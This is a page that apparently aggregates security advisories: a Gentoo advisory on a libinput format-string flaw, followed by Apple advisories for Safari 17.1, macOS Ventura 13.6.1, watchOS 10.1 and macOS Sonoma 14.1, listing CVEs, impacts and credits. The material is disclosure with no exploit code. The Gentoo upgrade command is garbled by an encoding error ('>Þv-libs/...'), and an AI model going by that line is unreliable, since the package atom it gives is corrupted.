Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-15

Gentoo Linux Security Advisory 202310-14 - A vulnerability has been discovered in libinput where an attacker may run malicious code by exploiting a format string vulnerability. Versions greater than or equal to 1.20.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libinput: format string vulnerability when using xf86-input-libinput  
     Date: October 26, 2023  
     Bugs: #839729  
       ID: 202310-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in libinput where an attacker may  
run malicous code by exploiting a format string vulnerability.

Background  
=========  
A library to handle input devices in Wayland and, via xf86-input-  
libinput, in X.org.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-libs/libinput  < 1.20.1      >= 1.20.1

Description  
==========  
An attacker may be able to run malicious code by exploiting a format  
string vulnerability. Please review the CVE identifier referenced below  
for details.

Impact  
=====  
When a device is detected by libinput, libinput logs several messages  
through log handlers set up by the callers. These log handlers usually  
eventually result in a printf call. Logging happens with the privileges  
of the caller, in the case of Xorg this may be root.

The device name ends up as part of the format string and a kernel device  
with printf-style format string placeholders in the device name can  
enable an attacker to run malicious code. An exploit is possible through  
any device where the attacker controls the device name, e.g. /dev/uinput  
or Bluetooth devices.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libinput users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/libinput-1.20.1"

References  
=========  
[ 1 ] CVE-2022-1215  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1215

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-14

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-14

Apple Security Advisory 10-25-2023-9 - Safari 17.1 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-25-2023-9 Safari 17.1

Safari 17.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213986.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebKit  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259836  
CVE-2023-40447: 이준성(Junsung Lee) of Cross Republic

WebKit  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
WebKit Bugzilla: 259890  
CVE-2023-41976: 이준성(Junsung Lee)

WebKit  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: A logic issue was addressed with improved checks.  
WebKit Bugzilla: 260173  
CVE-2023-42852: an anonymous researcher

WebKit Process Model  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 260757  
CVE-2023-41983: 이준성(Junsung Lee)

Safari 17.1 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmU5ZBYACgkQX+5d1TXa  
Ivpw7BAAv4zywcj5YWBFn+uOa4oeiFXAjjuk7+PICRb3nhpeasmbKG4YP/pRNzx5  
uhsUfI15AmZfjmEG71K1VqKsIATs8wcGq0UV/pOC3NpBr2CdSV3wdaR4n0ZV0Lqf  
eM8gt77Fwa05m6TMaW2E8oZ6eRsditcacx+kKQmvMLvc8hJaXs0ucPepsGbGjd6m  
QRfx6QicYyzsfBlF4uADWt+iEWozTNu7cRuc4OHXhkZOumdLRVhIdRlhqyEVNoiO  
ZSbLMYmtgY7cBSWpopTOXgria968bfP9PhvkIFMM3PMDADAqXsk/6Hu95/AyjVZR  
YZKd6Op9HDfC4CiQYeUaImwT+ZwgMyeYtdYn8MPmgGayl1SMBq0P7TZ6Ad1dVk1M  
FA2g1oTW09p+C+2aGXWMh9zamrFm2FH8KABX/P5W5NZHHsrU5BJgbLgAWf/wP5Jk  
HBlc8HZPZvoOHsXpRK0/vjbEeDLBQbiH5M5mpwEn2I+noYizwZSo6UmsVaIJQJCP  
qVnf+dpUVqJc3bIp/VfGJuSHvucRj1oahnvXVVVGxz66WCUVzy2Lr3PMmvrWTExC  
pC68uBgMFEys8t09EfYo4ShxgGZ02DGO4XAAIv/GFrd0SV8mXF/DPHBaM224Hu7z  
DE1lgWi9Y8Qc5nerw9Wmnhk9T5GBlNFvqepQ79JyU7Eus6fIgjo=  
=tLpC  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-25-2023-9

Apple Security Advisory 10-25-2023-5 - macOS Ventura 13.6.1 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-25-2023-5 macOS Ventura 13.6.1

macOS Ventura 13.6.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213985.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

CoreAnimation  
Available for: macOS Ventura  
Impact: An app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0w

FileProvider  
Available for: macOS Ventura  
Impact: An app may be able to cause a denial-of-service to Endpoint  
Security clients  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-42854: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Find My  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40413: Adam M.

Foundation  
Available for: macOS Ventura  
Impact: A website may be able to access sensitive user data when  
resolving symlinks  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2023-42844: Ron Masas of BreakPoint.SH

Image Capture  
Available for: macOS Ventura  
Impact: An app may be able to access protected user data  
Description: The issue was addressed with improved checks.  
CVE-2023-41077: Mickey Jin (@patch1t)

ImageIO  
Available for: macOS Ventura  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40416: JZ

IOTextEncryptionFamily  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40423: an anonymous researcher

iperf3  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
CVE-2023-38403

Kernel  
Available for: macOS Ventura  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de <http://pinauten.de/>)

Model I/O  
Available for: macOS Ventura  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42856: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Passkeys  
Available for: macOS Ventura  
Impact: An attacker may be able to access passkeys without  
authentication  
Description: The issue was addressed with additional permissions checks.  
CVE-2023-40401: an anonymous researcher, weize she

Pro Res  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of  
360 Vulnerability Research Institute

talagent  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40421: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Weather  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School of  
Computer Science, Romania

WindowServer  
Available for: macOS Ventura  
Impact: A website may be able to access the microphone without the  
microphone use indicator being shown  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-41975: an anonymous researcher

Additional recognition

GPU Drivers  
We would like to acknowledge an anonymous researcher for their  
assistance.

libarchive  
We would like to acknowledge Bahaa Naamneh for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

macOS Ventura 13.6.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmU5Y38ACgkQX+5d1TXa  
Ivp+exAAw1mhJG3ak3Vbixgq7vCy2CVcwwT1ISygYRdE0vJ2BPJVVMiNtflLuqoG  
wLazegOLQkj8VFYt4tWHC+mceX7NWq6zDeoR/lvure5DkbeFRoiyzqJimqpzLhBL  
nqzTUPvu4xrsC3u0DTTsJscEbZPx8h2WxXo/Cd1pIS2ajSDS5qklQIj+foOgPgXF  
AawOcERzVIgScIPCS3M8sIbZz63FV2CjX2OE+flr5fPSFDq0vtrOwa46pGw3hLjW  
BKhTJjhaUDneN/qsTuj+5AmqwDrCBUPltOxLDI/vjRUX+LGPmJdsPmnVL0HShNk+  
y87mbJtrXrHv6IrvcjdHfbglJVX+jjBsoGoUadM2qLNCoVK7vrfSvoFsba09Z3U+  
YK/1DCPVGq253vDfdWfoNsMUorCOP6CwmGZARMM+FErD3rUqxm3XBpZ3Jv4sLBvv  
fYyMLsn7YCBj31VzFafbliKGfduu7iijTdnfgTXEuNviTcOozeag8uNc0IW5tJKG  
bOEq6teHBXSiVQ5V84/K0hndN/DGiTXrQPJw0rjZ3V7N0olCyMdvXFGUhoDYVY5L  
WgKEpYgIJn44644Jzuj4gXEbc+sDlm+027OS2u5KrxNCtEIO2iLKTfc8dd2yJeq2  
CmMdV3N0L4smeLelGxZAtcwJc4Rdjh0Skair1iossxep+PGWAAo=kCLD  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-25-2023-5

Apple Security Advisory 10-25-2023-8 - watchOS 10.1 addresses bypass, code execution, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-25-2023-8 watchOS 10.1

watchOS 10.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213988.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Find My  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40413: Adam M.

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de)

Mail Drafts  
Available for: Apple Watch Series 4 and later  
Impact: Hide My Email may be deactivated unexpectedly  
Description: An inconsistent user interface issue was addressed with  
improved state management.  
CVE-2023-40408: Grzegorz Riegel

mDNSResponder  
Available for: Apple Watch Series 4 and later  
Impact: A device may be passively tracked by its Wi-Fi MAC address  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-42846: Talal Haj Bakry and Tommy Mysk of Mysk Inc. @mysk_co

Siri  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed by restricting options offered on  
a locked device.  
CVE-2023-41982: Bistrit Dahla  
CVE-2023-41997: Bistrit Dahla  
CVE-2023-41988: Bistrit Dahla

Weather  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School of  
Computer Science, Romania

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259836  
CVE-2023-40447: 이준성(Junsung Lee) of Cross Republic

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
WebKit Bugzilla: 259890  
CVE-2023-41976: 이준성(Junsung Lee)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: A logic issue was addressed with improved checks.  
WebKit Bugzilla: 260173  
CVE-2023-42852: an anonymous researcher

Additional recognition

VoiceOver  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal India for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmU5Y/cACgkQX+5d1TXa  
IvqRdg//cKScy6rHxISLi1pgX+dKMmWE7ANPnfYxgFgPw/yMnaCyt9q6U4xBkTo+  
LUrWI32vL59CVyflza+i32T1l9wxaKUHV3B1cVwqtxEeanB2i96HvuzEsEvjP0xN  
z3D0TEBTM3dG+mrefNnTPI4MyPlb936SmJ/3bLEwM72G24SHqhFjfzzTwjam6AKR  
F0GlVDsZgyZMKy26qDFxqlt8+nQ3dalsilWFWyJi/Y/k7o4zSl51rH482Kw6iMjc  
L5O/JFzpvYG7HMqB+eDoFBdS+q5WztulGq9hORwkfg7GsQfkNG/zp8Wu33WLNMNr  
Rz3TWqN9uxbceDbS0lVSDyrzwiE71LjdwirouBHpLg5CFK4Z8BLRXBZWtpYRJPII  
XNDv0JD5ms3mw1LqmA472jWbpHMRBirj5FUrSpCa+wHNVrFlu7CJ7u7JjV75uvPq  
QFdJMYBn6RZIMh0ZFIr1XkW6puyw6X/uuCK3dCzhPsh0BKuHWXM3OMx3PAx5Q59N  
4jJndkdbrZkx8LF5jHfT/6L42vGucc2f69dZEE5eCtOx97x+cSqQSC9UHFxyo2kf  
/4tBUf12VzE6EnDthxDWrMu7bDoCvNTklC2EDUDq19ERyGwU7sOobC5UMpKfVOag  
bm+dJlqocK6R6sF6u4h4W7NsY4myu2FSud0nMax0aY/i/+9+di4=  
=eIm0  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-25-2023-8

Apple Security Advisory 10-25-2023-4 - macOS Sonoma 14.1 addresses bypass, code execution, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-25-2023-4 macOS Sonoma 14.1

macOS Sonoma 14.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213984.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

App Support  
Available for: macOS Sonoma  
Impact: Parsing a file may lead to an unexpected app termination or  
arbitrary code execution  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-30774

AppSandbox  
Available for: macOS Sonoma  
Impact: An app may be able to access user-sensitive data  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40444: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Contacts  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41072: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Csaba Fitzl (@theevilbit) of Offensive Security  
CVE-2023-42857: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

CoreAnimation  
Available for: macOS Sonoma  
Impact: An app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0w

Emoji  
Available for: macOS Sonoma  
Impact: An attacker may be able to execute arbitrary code as root from  
the Lock Screen  
Description: The issue was addressed by restricting options offered on a  
locked device.  
CVE-2023-41989: Jewel Lambert

FileProvider  
Available for: macOS Sonoma  
Impact: An app may be able to cause a denial-of-service to Endpoint  
Security clients  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-42854: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Find My  
Available for: macOS Sonoma  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40413: Adam M.

Foundation  
Available for: macOS Sonoma  
Impact: A website may be able to access sensitive user data when  
resolving symlinks  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2023-42844: Ron Masas of BreakPoint.SH

ImageIO  
Available for: macOS Sonoma  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40416: JZ

IOTextEncryptionFamily  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40423: an anonymous researcher

iperf3  
Available for: macOS Sonoma  
Impact: A remote user may be able to cause unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
CVE-2023-38403

Kernel  
Available for: macOS Sonoma  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with improved permissions logic.  
CVE-2023-42850: Thijs Alkemade (@xnyhps) from Computest Sector 7, Brian  
McNulty, Zhongquan Li

Login Window  
Available for: macOS Sonoma  
Impact: An attacker with knowledge of a standard user's credentials can  
unlock another standard user's locked screen on the same Mac  
Description: A logic issue was addressed with improved state management.  
CVE-2023-42861: Jon Crain, 凯 王, Brandon Chesser & CPU IT, inc, Matthew  
McLean, Steven Maser, and Avalon IT Team of Concentrix

Mail Drafts  
Available for: macOS Sonoma  
Impact: Hide My Email may be deactivated unexpectedly  
Description: An inconsistent user interface issue was addressed with  
improved state management.  
CVE-2023-40408: Grzegorz Riegel

Maps  
Available for: macOS Sonoma  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-40405: Csaba Fitzl (@theevilbit) of Offensive Security

Model I/O  
Available for: macOS Sonoma  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42856: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Networking  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-40404: Certik Skyfall Team

Passkeys  
Available for: macOS Sonoma  
Impact: An attacker may be able to access passkeys without  
authentication  
Description: A logic issue was addressed with improved checks.  
CVE-2023-42847: an anonymous researcher

Photos  
Available for: macOS Sonoma  
Impact: Photos in the Hidden Photos Album may be viewed without  
authentication  
Description: An authentication issue was addressed with improved state  
management.  
CVE-2023-42845: Bistrit Dahla

Pro Res  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of  
360 Vulnerability Research Institute

Safari  
Available for: macOS Sonoma  
Impact: Visiting a malicious website may reveal browsing history  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-41977: Alex Renda

Safari  
Available for: macOS Sonoma  
Impact: Visiting a malicious website may lead to user interface spoofing  
Description: An inconsistent user interface issue was addressed with  
improved state management.  
CVE-2023-42438: Rafay Baloch & Muhammad Samaak, an anonymous researcher

Siri  
Available for: macOS Sonoma  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed by restricting options offered on  
a locked device.  
CVE-2023-41982: Bistrit Dahla  
CVE-2023-41997: Bistrit Dahla  
CVE-2023-41988: Bistrit Dahla

talagent  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40421: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Terminal  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2023-42842: an anonymous researcher

Vim  
Available for: macOS Sonoma  
Impact: Processing malicious input may lead to code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-4733  
CVE-2023-4734  
CVE-2023-4735  
CVE-2023-4736  
CVE-2023-4738  
CVE-2023-4750  
CVE-2023-4751  
CVE-2023-4752  
CVE-2023-4781

Weather  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School of  
Computer Science, Romania

WebKit  
Available for: macOS Sonoma  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259836  
CVE-2023-40447: 이준성(Junsung Lee) of Cross Republic

WebKit  
Available for: macOS Sonoma  
Impact: Processing web content may lead to arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
WebKit Bugzilla: 259890  
CVE-2023-41976: 이준성(Junsung Lee)

WebKit  
Available for: macOS Sonoma  
Impact: Processing web content may lead to arbitrary code execution  
Description: A logic issue was addressed with improved checks.  
WebKit Bugzilla: 260173  
CVE-2023-42852: an anonymous researcher

WebKit Process Model  
Available for: macOS Sonoma  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 260757  
CVE-2023-41983: 이준성(Junsung Lee)

WindowServer  
Available for: macOS Sonoma  
Impact: A website may be able to access the microphone without the  
microphone use indicator being shown  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-41975: an anonymous researcher

Additional recognition

libarchive  
We would like to acknowledge Bahaa Naamneh for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

Login Window  
We would like to acknowledge an anonymous researcher for their  
assistance.

man  
We would like to acknowledge Kirin (@Pwnrin) for their assistance.

Power Manager  
We would like to acknowledge Xia0o0o0o (@Nyaaaaa_ovo) of University of  
California, San Diego for their assistance.

Reminders  
We would like to acknowledge Noah Roskin-Frazee and Prof. J.  
(ZeroClicks.ai Lab) for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Sonoma 14.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmU5Y1gACgkQX+5d1TXa  
Ivp59RAA2EQwY61OvHZQ0u99Wov8TAoM9popyjLrkWBvKbTH03vdZIXyeCOaqFR8  
aT5SAlRwGOv0QIp/KmRweGlLl96/YP5fhgmDxISwahJZqOuwFkcj9OTfmoENyd6w  
7YYr0BwSfFhrFEQm/OdE4TbiXp+87YiPXA0NPVeClw15bpmQ830aIY3iMJrCLcAE  
ZI6QW9Yi3ynYhor1U+24V8hCM6LgMClNCWavZMorx3D1dfcPkhfspZL1cLqrGNqz  
cCF0IJaJDqKiFG//4FQqDbMOUuP3/FMkH4vED+9krIRqe51P6XDkVeI/BgFo6wpu  
hgZVgcPxMgbeiZX7O4BAY/ygLe2pKpyvBDJKCCo4GjkypcjmFhyyul+J45yLOSA1  
+x9EzYE8OSOn4dGA+qT9aKC4Csti9idoK0KsYHN7jCLU56Y9gvIV2n+PcWVhI4RF  
gE4BD+71vPyn6+tpf27+Kt5qW1Mj3ru6Q3u0w2xobbLdpgxc66EfCn2ZLxuzSqvc  
kSgwf1yOpiMLzBMAqWxgX51qppsQA1du8G6ZNmPjdyV28GpaWNzL/qb3vivaSYkK  
b6vrLEGID7U4wFjbVfuc7v0xmZeOgUprH6eQ7PnjRdmMq0xDaW8xFs3iGc6GScvl  
ZCI4CcZSLGPrCzmyUpbD+OMFT4SDDaOGSNEXW7jOrRjgQMc6bJQ=  
=YgRC  
-----END PGP SIGNATURE-----

Tag

#mac